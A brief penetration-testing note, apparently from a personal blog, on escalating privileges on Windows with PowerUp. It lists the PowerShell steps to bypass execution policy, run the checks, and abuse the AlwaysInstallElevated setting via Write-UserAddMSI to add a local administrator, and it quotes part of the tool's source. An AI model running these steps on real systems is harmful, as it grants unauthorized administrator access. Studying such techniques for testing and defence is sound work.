Powerup – https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
powershell.exe -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks
If you see AbuseFunction : Write-UserAddMSI under Checking for AlwaysInstallElevated registry key
Just let Powerup finish then copy and paste Write-UserAddMSI into PS and it will install a program which runs as admin which allows you to add user / password to local admin group.
To check it has worked
net localgroup administrators
——
Exstract from https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
function Write-UserAddMSI {
<#
.SYNOPSIS
Writes out a precompiled MSI installer that prompts for a user/group addition.
This function can be used to abuse Get-RegAlwaysInstallElevated.
.EXAMPLE
PS C:\> Write-UserAddMSI
Writes the user add MSI to the local directory.
——
myexploit 